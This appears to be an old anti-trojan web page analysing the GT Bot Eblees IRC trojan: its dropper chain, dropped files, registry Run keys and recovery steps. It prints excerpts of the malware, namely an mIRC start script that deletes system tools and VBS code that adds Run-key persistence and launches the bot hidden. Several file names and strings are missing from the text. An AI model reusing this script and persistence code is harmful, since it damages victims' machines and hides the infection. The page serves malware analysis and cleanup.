GTBot IRC DDos Trojan Information

GT Bot Eblees

Interview with Lockdown | Main Page | Trojan List | NoHack | SwatIt | Submit a Trojan

This GT Bot Trojan installs all of its files into C:\WINDOWS\FONTS\Eblees with the exception of Jumping.exe which is installed to C:\WINDOWS\SYSTEM. When the hacker's victim executes the web download trojan, setuper.exe, it logs onto the hacker's web server and then downloads and executes Jailss.exe. Jailss.exe is installed to C:\WINDOWS\TEMP. It drops the GT Bot files, executes the newly created Jumping.exe, then deletes itself and exits.

Jumping.exe writes the VBS files and executes them, they in turn write the registry values and start the GT Bot in stealth mode rendering it invisible to the computer user. Once the GT Bot has started up, it loads a script which promptly deletes the created VBS files. Jumping.exe repeats this cycle of events every time it is executed.

This is a relatively destructive bot in that when it executes, it attempts to delete Windows files. One of the ways this routine is performed is with the mIRC script The code excerpt is as follows:

on *:start:{
  if ($exists(C:\WINDOWS\netstat.exe) == $true) { /remove C:\WINDOWS\netstat.exe }
  if ($exists(C:\WINDOWS\regedit.exe) == $true) { /remove C:\WINDOWS\regedit.exe }
  if ($exists(Setsj.exe) == $true) { /remove Setsj.exe }
  remove $findfile(C:\,Klap.vbs,1)
  remove $findfile(C:\,Slap.vbs,1)
  .identd on $rand(A,Z) $+ $read $+ $rand(A,Z)
  nick Gh0st-[ $+ $r(1,1000) $+ $r(1,1000) $+ ]
  timerHidde 0 3 Hidde
  timercheck 0 30 .check

The "on *:start:" command instructs the mIRC program to execute all the commands between the curly braces { } when the script is initially loaded, and then everytime mirc is started thereafter. The code then checks to see if netstat.exe, regedit.exe or Setsj.exe exist, and if true they are also deleted. New versions of Windows will automatically replace some or all altered *.exe files. Setsj.exe is dropped by the GT Bot Dropper and is a text file, not an actual application. While the script is executing these commands there is a lot of noticeable hard drive activity as it performs the search. The remove $findfile(C:\,Klap.vbs,1) and remove $findfile(C:\,Slap.vbs,1) wastes time looking through every directory on the root C:\ drive instead of searching in the fixed C:\Windows path. Also, if your operating system is in another directory other than the default C:\Windows or on another drive this Trojan will create a folder on your C:\ drive named Windows and create another directory called Fonts inside of that and then inside of that a folder called Eblees where it installs most of its binaries. The Fonts directory if created by this Trojan will not have the same characteristics as the default Windows/Fonts folder in that it will not display files other than fonts. The files inside would be completely visible in Windows Explorer.

The Hacker has scripted this GT Bot to try and delete several important Windows file if it is discovered, or if any of the specified files are discovered then tries to exit Windows, which in theory should render the computer useless, however; our tests showed that it does not work in most instances, and The System Restore feature in Windows ME and higher will easily return your computer back to the pre-infected state. The files it attempts to remove are C:\, C:\WINDOWS\System.ini, C:\WINDOWS\Win.ini, C:\WINDOWS\, C:\WINDOWS\Rundll32.exe

The hacker uses the "identd" command to turn on the ident function of mIRC. The first character of the ident is set to a random upper case letter, then the middle of the ident is read from the file This file contains a long list of names combined with a string command to randomize even that list. A small sample of this text file is as follows:

DeeM $+ $rand(a,z)
keekaT $+ $rand(a,z)
N $+ $rand(a,z) $+ uGhtY`
PiN $+ $rand(a,z) $+ Ya
Ru $+ $rand(a,z) $+ f1an
sa $+ $rand(a,z) $+ hf

The last character of the ident is also a random uppercase letter. So if the first field was read, it could produce an ident like DDeeMkZ or FDeeMpJ.

The file Klap.vbs is a valid VBS file and contains the code:

Dim Q8HeLL
  Declares variable Q8HeLL
Set Q8HeLL = CreateObject("")
 sets the scripting shell to wscript.exe and assigns it to the variable Q8Hell
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Jumping", "C:\WINDOWS\System\Jumping.exe"
 Writes Jumping.exe to the run key so that it executes on every boot
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\KillersMe-", "C:\WINDOWS\KillerMe.exe"
 Writes this value to the registry, however, the file KillerMe.exe is never written to the Hard drive. This could be an error by the hacker from a testing phase of this GT Bot "C:\WINDOWS\FONTS\Eblees\ -i C:\WINDOWS\FONTS\Eblees\",0,true
 Starts GT Bot Eblees using as the mirc.ini, preventing mIRC from writing the tell tale mirc.ini to the folder. The "0" constant hides the application. Changing the 0 to 1 will reveal the mirc client on your desktop.

The file Slap.vbs is a start command for the GT Bot similiar to the one Klap.vbs uses, with the exception that it uses as the mirc.ini file instead of

Dropper File
setuper.exe Size 2K Discovered October 22, 2002

Files and Folders Dropped
c:\WINDOWS\FONTS\Eblees\ - Folder
c:\WINDOWS\FONTS\Eblees\download Default directory created by mIRC Folder
c:\WINDOWS\FONTS\Eblees\ Size: 18,738 bytes Text file referenced by,, and This file contains 657 Idents combined with a random letter generator giving a possible 17,082 results. Add that to the two random letters before and after this and you get 11,547,432 possibilities for idents.
c:\WINDOWS\FONTS\Eblees\ Size: 26,703 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\ Size: 443,392 bytes mIRC 5.7
c:\WINDOWS\FONTS\Eblees\IServer.exe Size: 20 bytes Text file referenced by, contains server information.
c:\WINDOWS\FONTS\Eblees\love.exe Size: 47 bytes Text file referenced by and
c:\WINDOWS\FONTS\Eblees\Msys.exe Size: 86 bytes Text file containing a web address and some text. The script syslock attempts to read from it to spam users on irc channels. It deletes the script each time it is called, re writes it using data it read from a variable that is set in the file saysaass.exe
c:\WINDOWS\FONTS\Eblees\saysaass.exe Size: 38 bytes Text file referenced by,, contains information for Global variables used in these scripts including server information and a web address
c:\WINDOWS\FONTS\Eblees\ Size: 13,213 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\Setsj.exe Size: 30 bytes Text file referenced by and
c:\WINDOWS\FONTS\Eblees\ Size: 3,002 bytes mirc.ini replacement file
c:\WINDOWS\FONTS\Eblees\ Size: 3,277 bytes mIRC Script
c:\WINDOWS\FONTS\Eblees\ Size: 2,913 bytes mirc.ini file

Before you make any changes to the registry, it is recommended that you first make a back up

This GT Bot attempts to delete regedit.exe. If that was successful on your machine, you will need to recover that file. On Windows 98 and 98SE run sfc from the start menu. On windows ME and higher you can simply run system restore.

Registry Keys Added
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Jumping"
Type: REG_SZ
Data: C:\WINDOWS\System\Jumping.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "KillersMe-"
Type: REG_SZ
Data: C:\WINDOWS\KillerMe.exe

Registry Keys Changed


Back to Links
Back to Top of GT Bot Information Page
Submit New bots to